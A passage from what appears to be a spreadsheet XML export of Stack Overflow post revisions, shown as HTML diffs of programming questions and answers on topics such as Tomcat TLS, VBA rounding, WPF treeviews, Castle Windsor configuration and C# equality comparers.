  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;span class="diff-add"&gt; any other handshake failure&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; Is there any event I can catch and handle in order to do that ?&lt;/p&gt; _x000D_
 &lt;p&gt;-- Yonatan&lt;/p&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;p&gt; My application is web service based and is running in &lt;span class="diff-add"&gt;tomcat&lt;/span&gt;. &lt;span class="diff-add"&gt;Tomcat&lt;/span&gt; is handling all network and the &lt;span class="diff-add"&gt;TLS&lt;/span&gt; layers, and the application does not aware of that.&lt;/p&gt; _x000D_
 &lt;p&gt; As I don't open any socket myself, where should I catch this Exception ?&lt;/p&gt; _x000D_
 &lt;p&gt; â€“ Yonatan&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>MTM</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; To expand a little on the accepted answer:&lt;/p&gt; _x000D_
 &lt;p&gt; "The Round function performs round to even, which is different from round to larger."&lt;br&gt;--Microsoft&lt;span class="diff-delete"&gt; Format&lt;/span&gt; always rounds up.&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;  Debug.Print Round(19.955, 2)_x000D_
  'Answer: 19.95_x000D_
_x000D_
  Debug.Print Format(19.955, "#.00")_x000D_
  'Answer: 19.96_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; ACC2000: Rounding Errors When You Use Floating-Point Numbers: &lt;a href="http://support.microsoft.com/kb/210423" rel="nofollow noreferrer"&gt;http://support.microsoft.com/kb/210423&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; ACC2000: How to Round a Number Up or Down by a Desired Increment: &lt;a href="http://support.microsoft.com/kb/209996" rel="nofollow noreferrer"&gt;http://support.microsoft.com/kb/209996&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; Round Function: &lt;a href="http://msdn2.microsoft.com/en-us/library/se6f2zfx.aspx" rel="nofollow noreferrer"&gt;http://msdn2.microsoft.com/en-us/library/se6f2zfx.aspx&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; How To Implement Custom Rounding Procedures: &lt;a href="http://support.microsoft.com/kb/196652" rel="nofollow noreferrer"&gt;http://support.microsoft.com/kb/196652&lt;/a&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; To expand a little on the accepted answer:&lt;/p&gt; _x000D_
 &lt;p&gt; "The Round function performs round to even, which is different from round to larger."&lt;br&gt;--Microsoft&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Format&lt;/span&gt; always rounds up.&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;  Debug.Print Round(19.955, 2)_x000D_
  'Answer: 19.95_x000D_
_x000D_
  Debug.Print Format(19.955, "#.00")_x000D_
  'Answer: 19.96_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; ACC2000: Rounding Errors When You Use Floating-Point Numbers: &lt;a href="http://support.microsoft.com/kb/210423" rel="nofollow noreferrer"&gt;http://support.microsoft.com/kb/210423&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; ACC2000: How to Round a Number Up or Down by a Desired Increment: &lt;a href="http://support.microsoft.com/kb/209996" rel="nofollow noreferrer"&gt;http://support.microsoft.com/kb/209996&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; Round Function: &lt;a href="http://msdn2.microsoft.com/en-us/library/se6f2zfx.aspx" rel="nofollow noreferrer"&gt;http://msdn2.microsoft.com/en-us/library/se6f2zfx.aspx&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; How To Implement Custom Rounding Procedures: &lt;a href="http://support.microsoft.com/kb/196652" rel="nofollow noreferrer"&gt;http://support.microsoft.com/kb/196652&lt;/a&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;No&lt;/span&gt;, &lt;span class="diff-delete"&gt;i'm&lt;/span&gt; not taking a Compiler class in College and trying to cheat.&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; I'm&lt;/span&gt; just reading the dragon book and this exercise caught my attention (and I have no idea even how to start solving it)&lt;/p&gt; _x000D_
 &lt;p&gt; Any clues/pointers?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;I'm reading the dragon book (just starting for now)&lt;/span&gt;, &lt;span class="diff-add"&gt;and I found this exercise which I can absolutely not solve. I understand the concept, but building a context-free grammar for this looks like way out of my league.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; NOTE: I'm&lt;/span&gt; not taking a Compiler class in College and trying to cheat.&lt;span class="diff-add"&gt; I'm&lt;/span&gt; just reading the dragon book and this exercise caught my attention (and I have no idea even how to start solving it)&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Plus, I have no teacher to go ask...&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt; Any clues/pointers?&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; BTW, If you have any idea on how I can prove that I'm not cheating in college, I'll gladly do it. I'm just trying to learn on my own here.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Thanks&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Steven A. Lowe</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm trying to pass a parameter into a component that requires a System.TimeSpan. I'm only able to get the 'long ticks' ctor to resolve.&lt;/p&gt; _x000D_
 &lt;p&gt; Here's a snippet of the config file:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&amp;lt;component id="timeInForce" type="System.TimeSpan, mscorlib"&amp;gt;_x000D_
    &amp;lt;hours&amp;gt;0&amp;lt;/hours&amp;gt;_x000D_
    &amp;lt;minutes&amp;gt;15&amp;lt;/minutes&amp;gt;_x000D_
    &amp;lt;seconds&amp;gt;0&amp;lt;/seconds&amp;gt;_x000D_
&amp;lt;/component&amp;gt;_x000D_
_x000D_
&amp;lt;component id="FooSettings" type="Foo.FooSettings, Foo"&amp;gt;_x000D_
    &amp;lt;parameters&amp;gt;_x000D_
        &amp;lt;tif&amp;gt;${timeInForce}&amp;lt;/tif&amp;gt;_x000D_
    &amp;lt;/parameters&amp;gt;_x000D_
&amp;lt;/component&amp;gt;_x000D_
  _x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; This is the exception:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;Castle.MicroKernel.Handlers.HandlerException : &lt;span class="diff-delete"&gt;Can't&lt;/span&gt; create component 'timeInForce'_x000D_
as it has dependencies to be satisfied. _x000D_
timeInForce is waiting for the following dependencies: _x000D_
_x000D_
Keys (components with specific keys)_x000D_
    - ticks which was not registered._x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Passing a tick value for the component parameter works, as in:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&amp;lt;parameters&amp;gt;&amp;lt;tif&amp;gt;0&amp;lt;/tif&amp;gt;&amp;lt;/parameters&amp;gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; but this defeats the purpose.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm trying to pass a parameter into a component that requires a System.TimeSpan. I'm only able to get the 'long ticks' ctor to resolve.&lt;/p&gt; _x000D_
 &lt;p&gt; Here's a snippet of the config file:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&amp;lt;component id="timeInForce" type="System.TimeSpan, mscorlib"&amp;gt;_x000D_
  &lt;span class="diff-add"&gt;&amp;lt;parameters&amp;gt;_x000D_
  &lt;/span&gt;  &amp;lt;hours&amp;gt;0&amp;lt;/hours&amp;gt;_x000D_
    &amp;lt;minutes&amp;gt;15&amp;lt;/minutes&amp;gt;_x000D_
    &amp;lt;seconds&amp;gt;0&amp;lt;/seconds&amp;gt;&lt;span class="diff-add"&gt;_x000D_
  &amp;lt;/parameters&amp;gt;&lt;/span&gt;_x000D_
&amp;lt;/component&amp;gt;_x000D_
_x000D_
&amp;lt;component id="FooSettings" type="Foo.FooSettings, Foo"&amp;gt;_x000D_
    &amp;lt;parameters&amp;gt;_x000D_
        &amp;lt;tif&amp;gt;${timeInForce}&amp;lt;/tif&amp;gt;_x000D_
    &amp;lt;/parameters&amp;gt;_x000D_
&amp;lt;/component&amp;gt;_x000D_
  _x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; This is the exception:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;Castle.MicroKernel.Handlers.HandlerException : &lt;span class="diff-add"&gt;Cant&lt;/span&gt; create component 'timeInForce'_x000D_
as it has dependencies to be satisfied. _x000D_
timeInForce is waiting for the following dependencies: _x000D_
_x000D_
Keys (components with specific keys)_x000D_
    - ticks which was not registered._x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Passing a tick value for the component parameter works, as in:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&amp;lt;parameters&amp;gt;&amp;lt;tif&amp;gt;0&amp;lt;/tif&amp;gt;&amp;lt;/parameters&amp;gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; but this defeats the purpose.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Dan</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I've got a class with Parent and Children properties.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;a href="http://img148.imageshack.us/img148/6802/edmxxe8.gif" rel="nofollow noreferrer"&gt;ADO.NET Entity Framework Hierarchical Page Class http://img148.imageshack.us/img148/6802/edmxxe8.gif&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; I want to display this hierarchy in a WPF treeview.&lt;/p&gt; _x000D_
 &lt;p&gt; Here's my XAML...&lt;/p&gt; _x000D_
 &lt;pre class="lang-xml s-code-block hljs"&gt;&lt;code&gt;&lt;span class="hljs-tag"&gt;&amp;lt;&lt;span class="hljs-name"&gt;TreeView&lt;/span&gt; &lt;span class="hljs-attr"&gt;Margin&lt;/span&gt;=&lt;span class="hljs-string"&gt;"12"&lt;/span&gt; &lt;span class="hljs-attr"&gt;Name&lt;/span&gt;=&lt;span class="hljs-string"&gt;"TreeViewPages"&lt;/span&gt; &lt;span class="hljs-attr"&gt;ItemsSource&lt;/span&gt;=&lt;span class="hljs-string"&gt;"{Binding}"&lt;/span&gt;&amp;gt;&lt;/span&gt;_x000D_
    &lt;span class="hljs-tag"&gt;&amp;lt;&lt;span class="hljs-name"&gt;TreeView.ItemTemplate&lt;/span&gt;&amp;gt;&lt;/span&gt;_x000D_
        &lt;span class="hljs-tag"&gt;&amp;lt;&lt;span class="hljs-name"&gt;HierarchicalDataTemplate&lt;/span&gt; &lt;span class="hljs-attr"&gt;ItemsSource&lt;/span&gt;=&lt;span class="hljs-string"&gt;"{Binding Children}"&lt;/span&gt;&amp;gt;&lt;/span&gt;_x000D_
            &lt;span class="hljs-tag"&gt;&amp;lt;&lt;span class="hljs-name"&gt;TextBlock&lt;/span&gt; &lt;span class="hljs-attr"&gt;Text&lt;/span&gt;=&lt;span class="hljs-string"&gt;"{Binding Path=ShortTitle}"&lt;/span&gt; /&amp;gt;&lt;/span&gt;_x000D_
        &lt;span class="hljs-tag"&gt;&amp;lt;/&lt;span class="hljs-name"&gt;HierarchicalDataTemplate&lt;/span&gt;&amp;gt;&lt;/span&gt;_x000D_
    &lt;span class="hljs-tag"&gt;&amp;lt;/&lt;span class="hljs-name"&gt;TreeView.ItemTemplate&lt;/span&gt;&amp;gt;&lt;/span&gt;_x000D_
&lt;span class="hljs-tag"&gt;&amp;lt;/&lt;span class="hljs-name"&gt;TreeView&lt;/span&gt;&amp;gt;&lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; And my VB code...&lt;/p&gt; _x000D_
 &lt;pre&gt;Dim db As New PageEntities_x000D_
Dim t = From p In db.Page&lt;span class="diff-delete"&gt;.Include("Children")&lt;/span&gt; __x000D_
        &lt;span class="diff-delete"&gt;Where&lt;/span&gt; p.&lt;span class="diff-delete"&gt;Parent&lt;/span&gt; &lt;span class="diff-delete"&gt;Is&lt;/span&gt; &lt;span class="diff-delete"&gt;Nothing&lt;/span&gt; &lt;span class="diff-delete"&gt;_&lt;/span&gt;_x000D_
        &lt;span class="diff-delete"&gt;Select&lt;/span&gt; &lt;span class="diff-delete"&gt;p&lt;/span&gt;_x000D_
&lt;span class="diff-delete"&gt;TreeViewPages&lt;/span&gt;.&lt;span class="diff-delete"&gt;ItemsSource&lt;/span&gt; &lt;span class="diff-delete"&gt;=&lt;/span&gt; &lt;span class="diff-delete"&gt;t&lt;/span&gt;_x000D_
&lt;/pre&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;But then&lt;/span&gt; I only get &lt;span class="diff-delete"&gt;a&lt;/span&gt; tree two levels deep&lt;span class="diff-delete"&gt;. What&lt;/span&gt; do I need to do to get this working?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I've got a&lt;span class="diff-add"&gt; Page&lt;/span&gt; class&lt;span class="diff-add"&gt; in my .edmx ADO.NET Entity Data Model file with&lt;/span&gt; with Parent and Children properties.&lt;span class="diff-add"&gt; It's for a hierarchy of Pages.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;a href="http://img148.imageshack.us/img148/6802/edmxxe8.gif" rel="nofollow noreferrer"&gt;ADO.NET Entity Framework Hierarchical Page Class http://img148.imageshack.us/img148/6802/edmxxe8.gif&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; This is handled in my SQL database with a ParentId foreign key in the Page table bound to the Id primary key of that same Page table.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; I want to display this hierarchy in a WPF treeview&lt;span class="diff-add"&gt;..&lt;/span&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; Here's my XAML...&lt;/p&gt; _x000D_
 &lt;pre class="lang-xml s-code-block hljs"&gt;&lt;code&gt;&lt;span class="hljs-tag"&gt;&amp;lt;&lt;span class="hljs-name"&gt;TreeView&lt;/span&gt; &lt;span class="hljs-attr"&gt;Margin&lt;/span&gt;=&lt;span class="hljs-string"&gt;"12"&lt;/span&gt; &lt;span class="hljs-attr"&gt;Name&lt;/span&gt;=&lt;span class="hljs-string"&gt;"TreeViewPages"&lt;/span&gt; &lt;span class="hljs-attr"&gt;ItemsSource&lt;/span&gt;=&lt;span class="hljs-string"&gt;"{Binding}"&lt;/span&gt;&amp;gt;&lt;/span&gt;_x000D_
    &lt;span class="hljs-tag"&gt;&amp;lt;&lt;span class="hljs-name"&gt;TreeView.ItemTemplate&lt;/span&gt;&amp;gt;&lt;/span&gt;_x000D_
        &lt;span class="hljs-tag"&gt;&amp;lt;&lt;span class="hljs-name"&gt;HierarchicalDataTemplate&lt;/span&gt; &lt;span class="hljs-attr"&gt;ItemsSource&lt;/span&gt;=&lt;span class="hljs-string"&gt;"{Binding Children}"&lt;/span&gt;&amp;gt;&lt;/span&gt;_x000D_
            &lt;span class="hljs-tag"&gt;&amp;lt;&lt;span class="hljs-name"&gt;TextBlock&lt;/span&gt; &lt;span class="hljs-attr"&gt;Text&lt;/span&gt;=&lt;span class="hljs-string"&gt;"{Binding Path=ShortTitle}"&lt;/span&gt; /&amp;gt;&lt;/span&gt;_x000D_
        &lt;span class="hljs-tag"&gt;&amp;lt;/&lt;span class="hljs-name"&gt;HierarchicalDataTemplate&lt;/span&gt;&amp;gt;&lt;/span&gt;_x000D_
    &lt;span class="hljs-tag"&gt;&amp;lt;/&lt;span class="hljs-name"&gt;TreeView.ItemTemplate&lt;/span&gt;&amp;gt;&lt;/span&gt;_x000D_
&lt;span class="hljs-tag"&gt;&amp;lt;/&lt;span class="hljs-name"&gt;TreeView&lt;/span&gt;&amp;gt;&lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; And my VB code...&lt;/p&gt; _x000D_
 &lt;pre&gt;Dim db As New PageEntities_x000D_
Dim t = From p In db.Page __x000D_
        &lt;span class="diff-add"&gt;Select&lt;/span&gt; p&lt;span class="diff-add"&gt;_x000D_
TreeViewPages&lt;/span&gt;.&lt;span class="diff-add"&gt;ItemsSource&lt;/span&gt; &lt;span class="diff-add"&gt;=&lt;/span&gt; &lt;span class="diff-add"&gt;t_x000D_
&lt;/span&gt;&lt;/pre&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; I want my tree to look like this:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;pre&gt;&lt;span class="diff-add"&gt;_x000D_
one_x000D_
&lt;/span&gt; &lt;span class="diff-add"&gt;  two&lt;/span&gt;_x000D_
      &lt;span class="diff-add"&gt;three_x000D_
&lt;/span&gt;   &lt;span class="diff-add"&gt;four&lt;/span&gt;_x000D_
&lt;/pre&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; But instead I get this:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;pre&gt;&lt;span class="diff-add"&gt;_x000D_
four_x000D_
three_x000D_
one_x000D_
   four_x000D_
   two_x000D_
      three_x000D_
two_x000D_
   three_x000D_
&lt;/span&gt;&lt;/pre&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; If I change the LINQ in my VB code to get only the root...&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;pre&gt;&lt;span class="diff-add"&gt;_x000D_
        Where p&lt;/span&gt;.&lt;span class="diff-add"&gt;Parent&lt;/span&gt; &lt;span class="diff-add"&gt;Is&lt;/span&gt; &lt;span class="diff-add"&gt;Nothing _&lt;/span&gt;_x000D_
&lt;/pre&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;Then&lt;/span&gt; I only get &lt;span class="diff-add"&gt;this one-item&lt;/span&gt; tree&lt;span class="diff-add"&gt;:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;pre&gt;&lt;span class="diff-add"&gt;_x000D_
one_x000D_
&lt;/span&gt;&lt;/pre&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; If I further change the LINQ in my VB code to "Include" children...&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;pre&gt;&lt;span class="diff-add"&gt;_x000D_
Dim t = From p In db.Page.Include("Children") __x000D_
&lt;/span&gt;&lt;/pre&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Then I only get&lt;/span&gt; two levels deep&lt;span class="diff-add"&gt;:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;pre&gt;&lt;span class="diff-add"&gt;_x000D_
one_x000D_
   two_x000D_
   four_x000D_
&lt;/span&gt;&lt;/pre&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; What&lt;/span&gt; do I need to do&lt;span class="diff-add"&gt; differently&lt;/span&gt; to get this working?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Zack Peterson</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; How do I learn where the source file for a given Python module is installed? &lt;span class="diff-delete"&gt;Is&lt;/span&gt; the method different on Windows than Linux?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; How do I learn where the source file for a given Python module is installed? &lt;span class="diff-add"&gt; (Is&lt;/span&gt; the method&lt;span class="diff-add"&gt; is&lt;/span&gt; different on Windows than Linux?&lt;span class="diff-add"&gt;)&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt;(I want to look at the datetime module sources, but I thought I'd ask a more general question.)&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Zizouz212</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Is it possible to create an attribute that can be initialized with a variable number of arguments?&lt;/p&gt; _x000D_
 &lt;p&gt; For example:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;[MyCustomAttribute(new &lt;span class="diff-delete"&gt;int[]{ 3&lt;/span&gt;,&lt;span class="diff-delete"&gt; &lt;/span&gt;4,&lt;span class="diff-delete"&gt; 5}&lt;/span&gt;)]  // this doesn't work_x000D_
public MyClass ..._x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Is it possible to create an attribute that can be initialized with a variable number of arguments?&lt;/p&gt; _x000D_
 &lt;p&gt; For example:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;[MyCustomAttribute(new &lt;span class="diff-add"&gt;int[3&lt;/span&gt;,4,&lt;span class="diff-add"&gt;5]&lt;/span&gt;)]  // this doesn't work_x000D_
public MyClass ..._x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Crono</t>
  </si>
  <si>
    <t>Rajmond Burgaj</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;public class FuncEqualityComparer&amp;lt;T&amp;gt; : IEqualityComparer&amp;lt;T&amp;gt;_x000D_
{_x000D_
    Func&amp;lt;T, T, bool&amp;gt; _comparer;_x000D_
_x000D_
    public FuncEqualityComparer( Func&amp;lt;T, T, bool&amp;gt; comparer )_x000D_
    {_x000D_
        _comparer = comparer;_x000D_
    }_x000D_
_x000D_
    public bool Equals( T x, T y )_x000D_
    {_x000D_
        return _comparer( x, y );_x000D_
    }&lt;span class="diff-delete"&gt;_x000D_
&amp;nbsp;&lt;/span&gt;_x000D_
    public int GetHashCode( T obj )_x000D_
    {_x000D_
        return &lt;span class="diff-delete"&gt;obj.GetHashCode&lt;/span&gt;();_x000D_
    }_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; Optionally, we can also do:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;public static class &lt;span class="diff-delete"&gt;EnumerableExtensions&lt;/span&gt;_x000D_
{_x000D_
    public static bool SequenceEqual&amp;lt;T&amp;gt;( this IEnumerable&amp;lt;T&amp;gt; first, IEnumerable&amp;lt;T&amp;gt; second, Func&amp;lt;T, T, bool&amp;gt; comparer )_x000D_
    {_x000D_
        return first.SequenceEqual( second, new FuncEqualityComparer&amp;lt;T&amp;gt;( comparer ) );_x000D_
    }_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;public class FuncEqualityComparer&amp;lt;T&amp;gt; : IEqualityComparer&amp;lt;T&amp;gt;_x000D_
{_x000D_
    Func&amp;lt;T, T, bool&amp;gt; _comparer;_x000D_
&lt;span class="diff-add"&gt;    Func&amp;lt;T, int&amp;gt; _hash;_x000D_
_x000D_
    public FuncEqualityComparer( Func&amp;lt;T, T, bool&amp;gt; comparer )_x000D_
    {_x000D_
        _comparer = comparer;_x000D_
        _hash = t =&amp;gt; t.GetHashCode();_x000D_
    }&lt;/span&gt;_x000D_
    public FuncEqualityComparer( Func&amp;lt;T, T, bool&amp;gt; comparer&lt;span class="diff-add"&gt;,&lt;/span&gt; &lt;span class="diff-add"&gt;Func&amp;lt;T, int&amp;gt; hash &lt;/span&gt;)_x000D_
    {_x000D_
        _comparer = comparer;_x000D_
&lt;span class="diff-add"&gt;     &lt;/span&gt;   &lt;span class="diff-add"&gt;_hash =&lt;/span&gt; &lt;span class="diff-add"&gt;hash;_x000D_
    &lt;/span&gt;}_x000D_
_x000D_
    public bool Equals( T x, T y )_x000D_
    {_x000D_
        return _comparer( x, y );_x000D_
    }_x000D_
    public int GetHashCode( T obj )_x000D_
    {_x000D_
        return &lt;span class="diff-add"&gt;_hash&lt;/span&gt;(&lt;span class="diff-add"&gt; obj &lt;/span&gt;);_x000D_
    }_x000D_
}_x000D_
&lt;span class="diff-add"&gt;&amp;nbsp;_x000D_
&lt;/span&gt;public static class &lt;span class="diff-add"&gt;SequenceExtensions&lt;/span&gt;_x000D_
{_x000D_
    public static bool SequenceEqual&amp;lt;T&amp;gt;( this IEnumerable&amp;lt;T&amp;gt; first, IEnumerable&amp;lt;T&amp;gt; second, Func&amp;lt;T, T, bool&amp;gt; comparer )_x000D_
    {_x000D_
        return first.SequenceEqual( second, new FuncEqualityComparer&amp;lt;T&amp;gt;( comparer&lt;span class="diff-add"&gt; ) );_x000D_
    }_x000D_
    public static bool SequenceEqual&amp;lt;T&amp;gt;( this IEnumerable&amp;lt;T&amp;gt; first, IEnumerable&amp;lt;T&amp;gt; second, Func&amp;lt;T, T, bool&amp;gt; comparer, Func&amp;lt;T, int&amp;gt; hash )_x000D_
    {_x000D_
        return first.SequenceEqual( second, new FuncEqualityComparer&amp;lt;T&amp;gt;( comparer, hash&lt;/span&gt; ) );_x000D_
    }_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Ruben Bartelink</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Could you use a recursive version of ldd for this? Someone seems to have &lt;a href="http://www.lysium.de/blog/index.php?/archives/35-Recursive-ldd.html" rel="nofollow noreferrer"&gt;written a script&lt;/a&gt; &lt;span class="diff-delete"&gt;to do this&lt;/span&gt;. This&lt;span class="diff-delete"&gt; wouldn't tell you whether there weren't still unresolved symbols, but it would&lt;/span&gt; at least tell you that all the &lt;span class="diff-delete"&gt;dependencies&lt;/span&gt; could be resolved, if they were in the .so correctly in the first place. You can guarantee that all the dependencies are referenced in the .so with linker options, and this plus recursive ldd would guarantee you no unresolved symbols.&lt;/p&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Could you use a recursive version of ldd for this? Someone seems to have &lt;a href="http://www.lysium.de/blog/index.php?/archives/35-Recursive-ldd.html" rel="nofollow noreferrer"&gt;written a script&lt;/a&gt; &lt;span class="diff-add"&gt;that might help&lt;/span&gt;. This at least tell you that all the &lt;span class="diff-add"&gt;dependency libs&lt;/span&gt; could be resolved, if they were&lt;span class="diff-add"&gt; specified&lt;/span&gt; in the .so correctly in the first place. You can guarantee that all the dependencies are referenced in the .so with linker options, and this plus recursive ldd would guarantee you no unresolved symbols.&lt;/p&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
&lt;/div&gt;</t>
